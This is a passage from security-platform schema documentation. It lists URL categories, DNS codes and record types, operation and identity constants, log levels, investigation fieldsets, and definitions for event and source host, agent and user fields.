47 XDM_CONST.URL_CATEGORY_QUESTIONABLE Websites containing tasteless humor, offensive content targeting specific demographics of individuals or groups of people.

48 XDM_CONST.URL_CATEGORY_REAL_ESTATE Information on property rentals, sales and related tips or information. Includes sites for real estate agents, firms, rental services, listings (and aggregates), and property improvement.

49 XDM_CONST.URL_CATEGORY_RECREATION_AND_HOBBIES Information, forums, associations, groups, and publications on recreations and hobbies.

50 XDM_CONST.URL_CATEGORY_REFERENCE_AND_RESEARCH Personal, professional, or academic reference portals, materials, or services. Includes online dictionaries, maps, almanacs, census information, libraries, genealogy and scientific information.

51 XDM_CONST.URL_CATEGORY_RELIGION Information regarding various religions, related activities or events. Includes websites for religious organizations, officials and places of worship.Includes sites for fortune telling.

52 XDM_CONST.URL_CATEGORY_SEARCH_ENGINES Sites that provide a search interface using keywords, phrases, or other parameters that may return information, websites, images or files as results.

53 XDM_CONST.URL_CATEGORY_SEX_EDUCATION Information on reproduction, sexual development, safe sex practices, sexually transmitted diseases, birth control, tips for better sex, as well as any related products or related paraphernalia. Includes websites for
related groups, forums or organizations.

54 XDM_CONST.URL_CATEGORY_SHAREWARE_AND_FREEWARE Sites that provide access to software, screensavers, icons, wallpapers, utilities, ringtones, themes or widgets for free and/or donations. Also includes open source projects.

55 XDM_CONST.URL_CATEGORY_SHOPPING Sites that facilitate the purchase of goods and services. Includes online merchants, websites for department stores, retail stores, catalogs, as well as sites that aggregate and monitor prices. Sites listed here should be
online merchants that sell a variety of items (or whose main purpose is online sales). A webpage for a cosmetics company that also happens to allow online purchasing should be categorized with cosmetics and not
shopping.

56 XDM_CONST.URL_CATEGORY_SOCIAL_NETWORKING User communities and sites where users interact with each other, post messages, pictures, or otherwise communicate with groups of people. Does not include blogs or personal sites.

57 XDM_CONST.URL_CATEGORY_SOCIETY Topics relating to the general population, issues that impact a large variety of people, such as fashion, beauty, philanthropic groups, societies, or children. Also includes restaurant websites.Includes websites designed
for children as well as restaurants.

58 XDM_CONST.URL_CATEGORY_SPORTS Information about sporting events, athletes, coaches, officials, teams or organizations, sports scores, schedules and related news, and any related paraphernalia. Includes websites regarding fantasy sports and other
virtual sports leagues.

59 XDM_CONST.URL_CATEGORY_STOCK_ADVICE_AND_TOOLS Information regarding the stock market, trading of stocks or options, portfolio management, investment strategies, quotes, or related news.

60 XDM_CONST.URL_CATEGORY_STREAMING_MEDIA Sites that stream audio or video content for free and/or purchase.Includes online radio stations and other streaming music services.

61 XDM_CONST.URL_CATEGORY_SWIMSUITS_AND_INTIMATE_APPAREL Sites that include information or images concerning swimsuits, intimate apparel or other suggestive clothing.

62 XDM_CONST.URL_CATEGORY_TRAINING_AND_TOOLS Sites that provide online education and training and related materials.Can include driving/traffic schools, workplace training, etc.

63 XDM_CONST.URL_CATEGORY_TRANSLATION Sites that provide translation services, including both user input and URL translations. These sites can also allow users to circumvent filtering as the target page's content is presented within the context of the
translator's URL.

64 XDM_CONST.URL_CATEGORY_TRAVEL Information regarding travel tips, deals, pricing information, destination information, tourism, and related services. Includes websites for hotels, local attractions, casinos, airlines, cruise lines, travel agencies, vehicle
rentals and sites that provide booking tools such as price monitors.Includes websites for local points of interest/tourist attractions such as the Eiffel Tower, the Grand Canyon, etc.

65 XDM_CONST.URL_CATEGORY_UNKNOWN Sites that have not yet been identified by PAN-DB. If availability is critical to your business and you must allow the traffic, alert on unknown sites, apply the best practice Security profiles to the traffic, and investigate
the alerts.

66 XDM_CONST.URL_CATEGORY_WEAPONS Sales, reviews, descriptions of or instructions regarding weapons and their use.
 Original Mapped Description

67 XDM_CONST.URL_CATEGORY_WEB_ADVERTISEMENTS Advertisements, media, content, and banners.

68 XDM_CONST.URL_CATEGORY_WEB_HOSTING Free or paid for hosting services for web pages, including information regarding web development, publication, promotion, and other methods to increase traffic.

69 XDM_CONST.URL_CATEGORY_WEB_BASED_EMAIL Any website that provides access to an email inbox and the ability to send and receive emails.

3.32 | XDM_CONST.DNS_RESPONSE_CODE
Response code. See RCODE from RFC1035.

Original Mapped Description

No error XDM_CONST.DNS_RESPONSE_CODE_NO_ERROR

Format Error XDM_CONST.DNS_RESPONSE_CODE_FORMAT_ERROR

Server Failure XDM_CONST.DNS_RESPONSE_CODE_SERVER_FAILURE

Non-Existent Domain XDM_CONST.DNS_RESPONSE_CODE_NON_EXISTENT_DOMAIN

Not Implemented XDM_CONST.DNS_RESPONSE_CODE_NOT_IMPLEMENTED

Query Refused XDM_CONST.DNS_RESPONSE_CODE_QUERY_REFUSED

Name Exists when it should not XDM_CONST.DNS_RESPONSE_CODE_NAME_EXISTS_WHEN_IT_SHOULD_NOT

RR Set Exists when it should not XDM_CONST.DNS_RESPONSE_CODE_RR_SET_EXISTS_WHEN_IT_SHOULD_NOT

RR Set that should exist does not XDM_CONST.DNS_RESPONSE_CODE_RR_SET_THAT_SHOULD_EXIST_DOES_NOT

Server Not Authoritative for zone XDM_CONST.DNS_RESPONSE_CODE_SERVER_NOT_AUTHORITATIVE_FOR_ZONE

Name not contained in zone XDM_CONST.DNS_RESPONSE_CODE_NAME_NOT_CONTAINED_IN_ZONE

Bad OPT Version XDM_CONST.DNS_RESPONSE_CODE_BAD_OPT_VERSION

TSIG Signature Failure XDM_CONST.DNS_RESPONSE_CODE_TSIG_SIGNATURE_FAILURE

Key not recognized XDM_CONST.DNS_RESPONSE_CODE_KEY_NOT_RECOGNIZED

Signature out of time window XDM_CONST.DNS_RESPONSE_CODE_SIGNATURE_OUT_OF_TIME_WINDOW

Bad TKEY Mode XDM_CONST.DNS_RESPONSE_CODE_BAD_TKEY_MODE

Duplicate key name XDM_CONST.DNS_RESPONSE_CODE_DUPLICATE_KEY_NAME

Algorithm not supported XDM_CONST.DNS_RESPONSE_CODE_ALGORITHM_NOT_SUPPORTED

Bad Truncation XDM_CONST.DNS_RESPONSE_CODE_BAD_TRUNCATION

3.33 | XDM_CONST.DNS_RECORD_TYPE
The DNS record type

Original Mapped Description

A XDM_CONST.DNS_RECORD_TYPE_A Address record [RFC1035].

AAAA XDM_CONST.DNS_RECORD_TYPE_AAAA IPv6 address record [RFC3596].

AFSDB XDM_CONST.DNS_RECORD_TYPE_AFSDB AFS database record [RFC1183].

APL XDM_CONST.DNS_RECORD_TYPE_APL Address Prefix List [RFC3123].

CAA XDM_CONST.DNS_RECORD_TYPE_CAA Certification Authority Authorization [RFC6844].

CDNSKEY XDM_CONST.DNS_RECORD_TYPE_CDNSKEY None [RFC7344].

CDS XDM_CONST.DNS_RECORD_TYPE_CDS Child DS [RFC7344].

CERT XDM_CONST.DNS_RECORD_TYPE_CERT Certificate record [RFC4398].

CNAME XDM_CONST.DNS_RECORD_TYPE_CNAME Canonical name record [RFC1035].

CSYNC XDM_CONST.DNS_RECORD_TYPE_CSYNC Child-to-Parent Synchronization [RFC7477].

DHCID XDM_CONST.DNS_RECORD_TYPE_DHCID DHCP identifier [RFC4701].

DLV XDM_CONST.DNS_RECORD_TYPE_DLV DNSSEC Lookaside Validation record [RFC4431].

DNAME XDM_CONST.DNS_RECORD_TYPE_DNAME Delegation name record [RFC6672].

 Original Mapped Description

DNSKEY XDM_CONST.DNS_RECORD_TYPE_DNSKEY DNS Key record [RFC4034].

DS XDM_CONST.DNS_RECORD_TYPE_DS Delegation signer [RFC4034].

EUI48 XDM_CONST.DNS_RECORD_TYPE_EUI48 MAC address (EUI-48) [RFC7043].

EUI64 XDM_CONST.DNS_RECORD_TYPE_EUI64 MAC address (EUI-64) [RFC7043].

HINFO XDM_CONST.DNS_RECORD_TYPE_HINFO Host Information [RFC8482].

HIP XDM_CONST.DNS_RECORD_TYPE_HIP Host Identity Protocol [RFC8005].

HTTPS XDM_CONST.DNS_RECORD_TYPE_HTTPS HTTPS Binding, [IETFDraft].

IPSECKEY XDM_CONST.DNS_RECORD_TYPE_IPSECKEY IPsec Key [RFC4025].

KEY XDM_CONST.DNS_RECORD_TYPE_KEY Key record [RFC2535, RFC2930].

KX XDM_CONST.DNS_RECORD_TYPE_KX Key Exchanger record [RFC2230].

LOC XDM_CONST.DNS_RECORD_TYPE_LOC Location record [RFC1876].

MX XDM_CONST.DNS_RECORD_TYPE_MX Mail exchange record [RFC1035, RFC7505].

NAPTR XDM_CONST.DNS_RECORD_TYPE_NAPTR Naming Authority Pointer [RFC3403].

NS XDM_CONST.DNS_RECORD_TYPE_NS Name server record [RFC1035].

NSEC XDM_CONST.DNS_RECORD_TYPE_NSEC Next Secure record [RFC4034].

NSEC3 XDM_CONST.DNS_RECORD_TYPE_NSEC3 Next Secure record version 3 [RFC5155].

NSEC3PARAM XDM_CONST.DNS_RECORD_TYPE_NSEC3PARAM NSEC3 parameters [RFC5155].

OPENPGPKEY XDM_CONST.DNS_RECORD_TYPE_OPENPGPKEY OpenPGP public key record [RFC7929].

PTR XDM_CONST.DNS_RECORD_TYPE_PTR PTR Resource Record [RFC1035].

RRSIG XDM_CONST.DNS_RECORD_TYPE_RRSIG DNSSEC signature [RFC4034].

RP XDM_CONST.DNS_RECORD_TYPE_RP Responsible Person [RFC1183].

SIG XDM_CONST.DNS_RECORD_TYPE_SIG Signature [RFC2535].

SMIMEA XDM_CONST.DNS_RECORD_TYPE_SMIMEA S/MIME cert association [RFC8162].

SOA XDM_CONST.DNS_RECORD_TYPE_SOA Start of [a zone of] authority record [RFC1035, RFC2308].

SRV XDM_CONST.DNS_RECORD_TYPE_SRV Service locator [RFC2782].

SSHFP XDM_CONST.DNS_RECORD_TYPE_SSHFP SSH Public Key Fingerprint [RFC4255].

SVCB XDM_CONST.DNS_RECORD_TYPE_SVCB Service Binding [IETFDraft].

TA XDM_CONST.DNS_RECORD_TYPE_TA DNSSEC Trust Authorities [IETFDraft].

TKEY XDM_CONST.DNS_RECORD_TYPE_TKEY Transaction Key record [RFC2930].

TLSA XDM_CONST.DNS_RECORD_TYPE_TLSA TLSA certificate association [RFC6698].

TSIG XDM_CONST.DNS_RECORD_TYPE_TSIG Transaction Signature [RFC2845].

TXT XDM_CONST.DNS_RECORD_TYPE_TXT Text record [RFC1035].

URI XDM_CONST.DNS_RECORD_TYPE_URI Uniform Resource Identifier [RFC7553].

ZONEMD XDM_CONST.DNS_RECORD_TYPE_ZONEMD Message Digests for DNS Zones [RFC8976].

3.34 | XDM_CONST.OPERATION_TYPE
The operation type

Original Mapped Description

DIR_SET_SECURITY XDM_CONST.OPERATION_TYPE_DIR_SET_SECURITY The operation sets the security settings of a directory.

DIR_CHANGE_MODE XDM_CONST.OPERATION_TYPE_DIR_CHANGE_MODE The operation changes the mode of a directory.

DIR_CHANGE_OWNER XDM_CONST.OPERATION_TYPE_DIR_CHANGE_OWNER The operation changes the owner of a directory.

DIR_CREATE XDM_CONST.OPERATION_TYPE_DIR_CREATE The operation creates a directory.

 Original Mapped Description

DIR_LINK XDM_CONST.OPERATION_TYPE_DIR_LINK The operation creates a hard link to a directory.

DIR_OPEN XDM_CONST.OPERATION_TYPE_DIR_OPEN The operation opens a directory.

DIR_QUERY XDM_CONST.OPERATION_TYPE_DIR_QUERY The operation queries a directory.

DIR_REMOVE XDM_CONST.OPERATION_TYPE_DIR_REMOVE The operation removes a directory.

DIR_RENAME XDM_CONST.OPERATION_TYPE_DIR_RENAME The operation renames a directory.

DIR_SET_ATTRIBUTES XDM_CONST.OPERATION_TYPE_DIR_SET_ATTRIBUTES The operation sets the attributes of a directory.

DIR_STATS XDM_CONST.OPERATION_TYPE_DIR_STATS The operation retrieves statistics about a directory.

DIR_WRITE XDM_CONST.OPERATION_TYPE_DIR_WRITE The operation writes to a directory.

FILE_CHANGE_MODE XDM_CONST.OPERATION_TYPE_FILE_CHANGE_MODE The operation changes the mode of a file.

FILE_CHANGE_OWNER XDM_CONST.OPERATION_TYPE_FILE_CHANGE_OWNER The operation changes the owner of a file.

FILE_CREATE XDM_CONST.OPERATION_TYPE_FILE_CREATE The operation creates a file.

FILE_DELETE_EXT_ATTRIBUTES XDM_CONST.OPERATION_TYPE_FILE_DELETE_EXT_ATTRIBUTES The operation deletes the extended attributes of a file.

FILE_LINK XDM_CONST.OPERATION_TYPE_FILE_LINK The operation creates a hard link to a file.

FILE_OPEN XDM_CONST.OPERATION_TYPE_FILE_OPEN The operation opens a file.

FILE_REMOVE XDM_CONST.OPERATION_TYPE_FILE_REMOVE The operation removes a file.

FILE_RENAME XDM_CONST.OPERATION_TYPE_FILE_RENAME The operation renames a file.

FILE_REPARSE XDM_CONST.OPERATION_TYPE_FILE_REPARSE The operation reparses a file.

FILE_SET_ATTRIBUTES XDM_CONST.OPERATION_TYPE_FILE_SET_ATTRIBUTES The operation sets the attributes of a file.

FILE_SET_SECURITY XDM_CONST.OPERATION_TYPE_FILE_SET_SECURITY The operation sets the security settings of a file.

FILE_STATS XDM_CONST.OPERATION_TYPE_FILE_STATS The operation retrieves statistics about a file.

FILE_WRITE XDM_CONST.OPERATION_TYPE_FILE_WRITE The operation writes to a file.

IMAGE_LOAD XDM_CONST.OPERATION_TYPE_IMAGE_LOAD The operation loads an image file.

IMAGE_MPROTECT XDM_CONST.OPERATION_TYPE_IMAGE_MPROTECT The operation changes the memory protection of an image file.

IMAGE_PRE_LOAD XDM_CONST.OPERATION_TYPE_IMAGE_PRE_LOAD The operation pre-loads an image file.

IMAGE_SO_LOAD XDM_CONST.OPERATION_TYPE_IMAGE_SO_LOAD The operation loads a shared object image file.

IMAGE_UNLOAD XDM_CONST.OPERATION_TYPE_IMAGE_UNLOAD The operation unloads an image file.

PROCESS_CREATE XDM_CONST.OPERATION_TYPE_PROCESS_CREATE The operation creates a process.

PROCESS_TERMINATE XDM_CONST.OPERATION_TYPE_PROCESS_TERMINATE The operation terminates a process.

REGISTRY_CREATE_KEY XDM_CONST.OPERATION_TYPE_REGISTRY_CREATE_KEY The operation creates a registry key.

REGISTRY_DELETE_KEY XDM_CONST.OPERATION_TYPE_REGISTRY_DELETE_KEY The operation deletes a registry key.

REGISTRY_DELETE_VALUE XDM_CONST.OPERATION_TYPE_REGISTRY_DELETE_VALUE The operation deletes a registry value.

REGISTRY_LOAD XDM_CONST.OPERATION_TYPE_REGISTRY_LOAD The operation loads a registry hive.

REGISTRY_OPEN XDM_CONST.OPERATION_TYPE_REGISTRY_OPEN The operation opens a registry key.

REGISTRY_QUERY_VALUE XDM_CONST.OPERATION_TYPE_REGISTRY_QUERY_VALUE The operation retrieves the value of a registry key.

REGISTRY_RENAME_KEY XDM_CONST.OPERATION_TYPE_REGISTRY_RENAME_KEY The operation renames a registry key.

REGISTRY_RESTORE XDM_CONST.OPERATION_TYPE_REGISTRY_RESTORE The operation restores a registry hive.

REGISTRY_SAVE XDM_CONST.OPERATION_TYPE_REGISTRY_SAVE The operation saves a registry hive.

REGISTRY_SET_VALUE XDM_CONST.OPERATION_TYPE_REGISTRY_SET_VALUE The operation sets the value of a registry key.

REGISTRY_UNLOAD XDM_CONST.OPERATION_TYPE_REGISTRY_UNLOAD The operation unloads a registry hive.

AUTH_MFA XDM_CONST.OPERATION_TYPE_AUTH_MFA The operation authorizes an account using Multi-factor authentication (MFA).

AUTH_LOGIN XDM_CONST.OPERATION_TYPE_AUTH_LOGIN The operation is a login authentication.

3.35 | XDM_CONST.IDENTITY_TYPE
The identity type of a user.

Original Mapped Description

MACHINE XDM_CONST.IDENTITY_TYPE_MACHINE The identity is a machine account.

USER XDM_CONST.IDENTITY_TYPE_USER The identity is a regular user identity.

BUILTIN XDM_CONST.IDENTITY_TYPE_BUILTIN The identity is a builtin system account and always present on the system.

VIRTUAL XDM_CONST.IDENTITY_TYPE_VIRTUAL The identity is a virtual identity.

UNKNOWN XDM_CONST.IDENTITY_TYPE_UNKNOWN The identity type is unknown.

3.36 | XDM_CONST.SCOPE_TYPE
The user's scope.

Original Mapped Description

LOCAL XDM_CONST.SCOPE_TYPE_LOCAL The user is local to a specific machine.

DOMAIN XDM_CONST.SCOPE_TYPE_DOMAIN The user is part of active directory domain.

AZURE XDM_CONST.SCOPE_TYPE_AZURE The user is part of Microsoft Azure domain.

MICROSOFT XDM_CONST.SCOPE_TYPE_MICROSOFT The user is a Microsoft account.

UNKNOWN XDM_CONST.SCOPE_TYPE_UNKNOWN The user's scope is unknown.

3.37 | XDM_CONST.LOG_LEVEL
The event's level of importance.

Original Mapped Description

8000 XDM_CONST.LOG_LEVEL_EMERGENCY Indicates a catastrophic failure or system-wide issue or security incident requires immediate attention.

7000 XDM_CONST.LOG_LEVEL_ALERT Indicates a severe issue or security event that requires immediate attention but does not necessarily mean that the application or system has completely failed or has been compromised.

6000 XDM_CONST.LOG_LEVEL_CRITICAL Indicates a critical error or problem which prevents the application from continuing to run.

5000 XDM_CONST.LOG_LEVEL_ERROR Indicates an error or problem that has occurred, but the application can still continue running.

4000 XDM_CONST.LOG_LEVEL_WARNING Indicates a potential problem or a potential security issue that should be addressed.

3000 XDM_CONST.LOG_LEVEL_NOTICE Provides non-critical information that may be helpful for troubleshooting or debugging purposes. This level is typically used for messages that are more informational than warning or error messages.

2000 XDM_CONST.LOG_LEVEL_INFORMATIONAL Provides general information, such as startup messages or progress updates.

1000 XDM_CONST.LOG_LEVEL_DEBUG Provides fine-grained informational messages that are typically only relevant during debugging or investigation.

4 | XDM Fieldsets

4.1 | fieldset.xdm_core
Returns a pre-defined set of the most relevant XDM schema fields:

• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.user.user_type
• xdm.source.sent_bytes
• xdm.source.agent.identifier
• xdm.source.user_agent
• xdm.source.process.name
• xdm.source.process.executable.path
• xdm.source.process.executable.filename
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.user.user_type
• xdm.target.sent_bytes
• xdm.target.agent.identifier
• xdm.target.url
• xdm.target.domain
• xdm.target.process.name
• xdm.target.process.executable.path
• xdm.target.process.executable.filename
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product
• xdm.event.is_completed
• xdm.event.duration

4.2 | fieldset.xdm_cloud
Returns a pre-defined set of the most relevant XDM schema fields for cloud investigation:
 • _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.cloud.provider
• xdm.source.zone
• xdm.source.cloud.region
• xdm.source.cloud.project
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.cloud.provider
• xdm.target.zone
• xdm.target.cloud.region
• xdm.target.cloud.project
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product

4.3 | fieldset.xdm_endpoint
Returns a pre-defined set of the most relevant XDM schema fields for endpoint investigation:

• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.host.os
• xdm.source.host.ipv4_addresses
• xdm.source.user.username
• xdm.source.process.name
• xdm.source.process.command_line
• xdm.source.process.executable.signer
• xdm.source.process.executable.md5
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.host.os
• xdm.target.host.ipv4_addresses
• xdm.target.user.username
• xdm.target.process.name
• xdm.target.process.command_line
• xdm.target.file.filename
• xdm.target.domain
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product

4.4 | fieldset.xdm_identity
Returns a pre-defined set of the most relevant XDM schema fields for identity investigation:

• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.user.sam_account_name
• xdm.source.user.domain
• xdm.source.user.user_type
• xdm.source.user.first_name
• xdm.source.user.last_name
• xdm.source.user.identifier
• xdm.source.user.identity_type
• xdm.source.user.scope
• xdm.source.location.country
• xdm.logon.type
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.user.sam_account_name
• xdm.target.user.domain
• xdm.target.user.user_type
• xdm.target.user.first_name
• xdm.target.user.last_name
• xdm.target.user.identifier
• xdm.target.user.identity_type
• xdm.target.user.scope
• xdm.target.location.country
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product

4.5 | fieldset.xdm_network
Returns a pre-defined set of the most relevant XDM schema fields for network investigation:
 • _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.user.user_type
• xdm.source.sent_bytes
• xdm.source.location.country
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.user.user_type
• xdm.target.sent_bytes
• xdm.target.location.country
• xdm.network.ip_protocol
• xdm.network.application_protocol
• xdm.target.url
• xdm.target.domain
• xdm.target.resource.name
• xdm.target.resource.type
• xdm.network.http.url
• xdm.network.http.method
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product

5 | XDM Fields

5.1 | xdm.session_context_id
A unique ID to identify the user session; or the context of multiple events related to the same activity that can be used to correlate between the events.

Description A unique ID to identify the user session; or the context of multiple events related to the same activity that can be used to correlate between the events.

Datatype String

Dataclass Scalar

5.2 | xdm.event
An event that occurred

xdm.event.id

Description The event ID within the original source.

Datatype String

Dataclass Scalar

xdm.event.type

Description The event type.

Datatype String

Dataclass Scalar

Examples NETWORK, PROCESS, AUDIT, HOST

xdm.event.original_event_type

Description The original event type.

Datatype String

Dataclass Scalar

xdm.event.operation

Description The operation type.

Datatype XDM_CONST.OPERATION_TYPE

Dataclass Scalar

Examples XDM_CONST.OPERATION_TYPE_DIR_CREATE, XDM_CONST.OPERATION_TYPE_FILE_WRITE, XDM_CONST.OPERATION_TYPE_IMAGE_LOAD, XDM_CONST.OPERATION_TYPE_PROCESS_TERMINATE, XDM_CONST.OPERATION_TYPE_PROCESS_CREATE

xdm.event.operation_sub_type

Description The operation sub-type.

Datatype String

Dataclass Scalar

Examples INJECTION, TUNNEL, NTLM

xdm.event.description

Description The event's message or description.

 Datatype String

Dataclass Scalar

xdm.event.tags

Description List of tags that are related to the activity.

Datatype XDM_CONST.EVENT_TAG

Dataclass Array

Examples XDM_CONST.EVENT_TAG_AUTHENTICATION, XDM_CONST.EVENT_TAG_NETWORK, XDM_CONST.EVENT_TAG_CLOUD, XDM_CONST.EVENT_TAG_SAAS, XDM_CONST.EVENT_TAG_ONPREM

xdm.event.outcome

Description The result of this activity.

Datatype XDM_CONST.OUTCOME

Dataclass Scalar

Examples XDM_CONST.OUTCOME_SUCCESS, XDM_CONST.OUTCOME_FAILED, XDM_CONST.OUTCOME_PARTIAL, XDM_CONST.OUTCOME_UNKNOWN

xdm.event.outcome_reason

Description The reason for the outcome.

Datatype String

Dataclass Scalar

xdm.event.duration

Description The amount of time, in milliseconds, for the completion of the action.

Datatype Number

Dataclass Scalar

xdm.event.is_completed

Description Whether the action was completed or is ongoing.

Datatype Boolean

Dataclass Scalar

xdm.event.log_level

Description The importance level of the event.

Datatype XDM_CONST.LOG_LEVEL

Dataclass Scalar

Examples XDM_CONST.LOG_LEVEL_CRITICAL, XDM_CONST.LOG_LEVEL_ERROR, XDM_CONST.LOG_LEVEL_WARNING, XDM_CONST.LOG_LEVEL_DEBUG

5.3 | xdm.source
Information about the source of the activity

xdm.source.host

The source host that initiated the activity.

xdm.source.host.hostname

Description The host name of the source host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.host.os_family

Description The operating system of the source host that initiated the activity.

Datatype XDM_CONST.OS_FAMILY

Dataclass Scalar

Examples XDM_CONST.OS_FAMILY_WINDOWS, XDM_CONST.OS_FAMILY_MACOS, XDM_CONST.OS_FAMILY_LINUX, XDM_CONST.OS_FAMILY_ANDROID, XDM_CONST.OS_FAMILY_IOS

xdm.source.host.os

Description The specific operating system of the source host that initiated the activity, including version.
 Datatype String

Dataclass Scalar

xdm.source.host.fqdn

Description The fully-qualified domain name (FQDN) of the source host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.host.device_category

Description The device category of the source host that initiated the activity.

Datatype String

Dataclass Scalar

Examples Infusion System, ATM Machine, Personal Computer, 3D Printer

xdm.source.host.device_model

Description The device model of the source host that initiated the activity.

Datatype String

Dataclass Scalar

Examples iPad, PA-3200, ThinkPad E14, e2-highmem-8, t2.micro

xdm.source.host.device_id

Description The unique device ID of the source host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.host.ipv4_addresses

Description The IPv4 addresses of the source host that initiated the activity.

Datatype IPv4

Dataclass Array

xdm.source.host.ipv6_addresses

Description The IPv6 addresses of the source host that initiated the activity.

Datatype IPv6

Dataclass Array

xdm.source.host.ipv4_public_addresses

Description The IPv4 public addresses of the source host that initiated the activity.

Datatype IPv4

Dataclass Array

xdm.source.host.ipv6_public_addresses

Description The IPv6 public addresses of the source host that initiated the activity.

Datatype IPv6

Dataclass Array

xdm.source.host.mac_addresses

Description The MAC addresses of the source host that initiated the activity.

Datatype String

Dataclass Array

xdm.source.host.manufacturer

Description The device manufacturer of the source host that initiated the activity.

Datatype String
 Dataclass Scalar

xdm.source.host.hardware_uuid

Description The unique hardware manufacturing ID of the source host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.host.boot_time

Description The last known start up time of the source host that initiated the activity.

Datatype Timestamp

Dataclass Scalar

xdm.source.host.image

Description The image/runtime name/ID of the source host that initiated the activity.

Datatype String

Dataclass Scalar

Examples ami-19231, python3.9, nodejs14.x

xdm.source.host.memory

Description The memory capacity size in bytes of the source host that initiated the activity.

Datatype Number

Dataclass Scalar

xdm.source.agent

The agent on the host that initiated the activity.

xdm.source.agent.identifier

Description The ID of the agent on the host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.agent.type

Description The type of the agent on the host that initiated the activity

Datatype XDM_CONST.AGENT_TYPE

Dataclass Scalar

Examples XDM_CONST.AGENT_TYPE_REGULAR, XDM_CONST.AGENT_TYPE_COLLECTOR, XDM_CONST.AGENT_TYPE_VDI, XDM_CONST.AGENT_TYPE_CLOUD

xdm.source.agent.version

Description The version of the agent on the host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.agent.content_version

Description The content version of the agent on the host that initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.agent.installation_time

Description The installation time of the agent on the host that initiated the activity.

Datatype Timestamp

Dataclass Scalar

xdm.source.user

The user who initiated the activity.

xdm.source.user.identifier
 Description The ID of the user, such as GUID, SID or any other ID that uniquely identifies the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.username

Description The user name used for identification of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.user_type

Description The type of the user who initiated the activity.

Datatype XDM_CONST.USER_TYPE

Dataclass Scalar

Examples XDM_CONST.USER_TYPE_REGULAR, XDM_CONST.USER_TYPE_SERVICE_ACCOUNT, XDM_CONST.USER_TYPE_MACHINE_ACCOUNT

xdm.source.user.first_name

Description The first name of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.last_name

Description The last name of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.middle_name

Description The middle name of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.employee_id

Description The employee ID of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.badge_id

Description The work badge ID of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.ou

Description The organization unit of the user who initiated the activity.

Datatype String

Dataclass Scalar

xdm.source.user.domain

Description The domain to which the user who initiated the activity belongs.

Datatype String

Dataclass Scalar

xdm.source.user.is_password_changeable

Description Whether the password of the user who initiated the activity is changeable.

Datatype Boolean
 Dataclass Scalar

xdm.source.user.is_password_expired

Description Whether the password of the user who initiated the activity has expired.

Datatype Boolean

Dataclass Scalar

xdm.source.user.is_password_required

Description Whether the password of the user who initiated the activity is required.

Datatype Boolean

Dataclass Scalar

xdm.source.user.is_disabled

Description Whether the user who initiated the activity is disabled.

Datatype Boolean

Dataclass Scalar

xdm.source.user.groups

Description The groups or roles to which the user who initiated the activity belongs.

Datatype String

Dataclass Array

xdm.source.user.netbios_domain

Description The subdomain of the user who initiated the activity's DNS domain name. See https://docs.microsoft.com/en-us/exchange/disjoint-namespace-scenarios-exchange-2013-help#dns-and-netbios-domain-names (auto-enriched field).

Datatype String

Dataclass Scalar

Examples mycompany

Enriched True

xdm.source.user.sam_account_name

Description The logon name of the user who initiated the activity. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#samaccountname (auto-enriched field).

Datatype String

Dataclass Scalar

Examples jondoe

Enriched True

xdm.source.user.upn

Description The principal name of the user who initiated the activity. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#userprincipalname (auto-enriched field).

Datatype String

Dataclass Scalar

Examples [email protected]

Enriched True

xdm.source.user.identity_type

Description The identity type of the user who initiated the activity (auto-enriched field).

Datatype XDM_CONST.IDENTITY_TYPE

Dataclass Scalar

Examples XDM_CONST.IDENTITY_TYPE_MACHINE, XDM_CONST.IDENTITY_TYPE_USER, XDM_CONST.IDENTITY_TYPE_BUILTIN, XDM_CONST.IDENTITY_TYPE_VIRTUAL, XDM_CONST.IDENTITY_TYPE_UNKNOWN

Enriched True

xdm.source.user.scope

Description The scope of the user who initiated the activity (auto-enriched field).
 Datatype XDM_CONST.SCOPE_TYPE

Dataclass Scalar

